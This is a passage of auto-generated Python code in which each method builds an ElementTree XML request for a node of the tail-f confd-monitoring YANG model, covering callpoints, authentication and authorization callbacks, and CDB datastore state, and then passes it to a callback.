callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
registration_type = ET.SubElement(notification_stream_replay, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
notification_stream_replay = ET.SubElement(callpoints, "notification-stream-replay")
name_key = ET.SubElement(notification_stream_replay, "name")
name_key.text = kwargs.pop('name')
error = ET.SubElement(notification_stream_replay, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_enabled(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
enabled = ET.SubElement(authentication_callback, "enabled")
enabled.text = kwargs.pop('enabled')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
registration_type = ET.SubElement(authentication_callback, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authentication_callback_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authentication_callback = ET.SubElement(callpoints, "authentication-callback")
error = ET.SubElement(authentication_callback, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_enabled(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
enabled = ET.SubElement(authorization_callbacks, "enabled")
enabled.text = kwargs.pop('enabled')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
registration_type = ET.SubElement(authorization_callbacks, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_authorization_callbacks_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
authorization_callbacks = ET.SubElement(callpoints, "authorization-callbacks")
error = ET.SubElement(authorization_callbacks, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name = ET.SubElement(datastore, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_transaction_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
transaction_id = ET.SubElement(datastore, "transaction-id")
transaction_id.text = kwargs.pop('transaction_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_write_queue(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
write_queue = ET.SubElement(datastore, "write-queue")
write_queue.text = kwargs.pop('write_queue')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_filename(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
filename = ET.SubElement(datastore, "filename")
filename.text = kwargs.pop('filename')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_disk_size(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
disk_size = ET.SubElement(datastore, "disk-size")
disk_size.text = kwargs.pop('disk_size')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_ram_size(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
ram_size = ET.SubElement(datastore, "ram-size")
ram_size.text = kwargs.pop('ram_size')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_read_locks(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
read_locks = ET.SubElement(datastore, "read-locks")
read_locks.text = kwargs.pop('read_locks')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_write_lock_set(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
write_lock_set = ET.SubElement(datastore, "write-lock-set")
write_lock_set.text = kwargs.pop('write_lock_set')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_subscription_lock_set(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
subscription_lock_set = ET.SubElement(datastore, "subscription-lock-set")
subscription_lock_set.text = kwargs.pop('subscription_lock_set')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_waiting_for_replication_sync(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
waiting_for_replication_sync = ET.SubElement(datastore, "waiting-for-replication-sync")
waiting_for_replication_sync.text = kwargs.pop('waiting_for_replication_sync')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_pending_subscription_sync_priority(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
pending_subscription_sync = ET.SubElement(datastore, "pending-subscription-sync")
priority = ET.SubElement(pending_subscription_sync, "priority")
priority.text = kwargs.pop('priority')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_pending_subscription_sync_notification_client_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
pending_subscription_sync = ET.SubElement(datastore, "pending-subscription-sync")
notification = ET.SubElement(pending_subscription_sync, "notification")
client_name = ET.SubElement(notification, "client-name")
client_name.text = kwargs.pop('client_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_pending_subscription_sync_time_remaining(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
pending_subscription_sync = ET.SubElement(datastore, "pending-subscription-sync")
time_remaining = ET.SubElement(pending_subscription_sync, "time-remaining")
time_remaining.text = kwargs.pop('time_remaining')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_pending_notification_queue_notification_priority(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
pending_notification_queue = ET.SubElement(datastore, "pending-notification-queue")
notification = ET.SubElement(pending_notification_queue, "notification")
priority = ET.SubElement(notification, "priority")
priority.text = kwargs.pop('priority')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_pending_notification_queue_notification_client_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
pending_notification_queue = ET.SubElement(datastore, "pending-notification-queue")
notification = ET.SubElement(pending_notification_queue, "notification")
client_name = ET.SubElement(notification, "client-name")
client_name.text = kwargs.pop('client_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
name = ET.SubElement(client, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_info(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
info = ET.SubElement(client, "info")
info.text = kwargs.pop('info')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_type(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
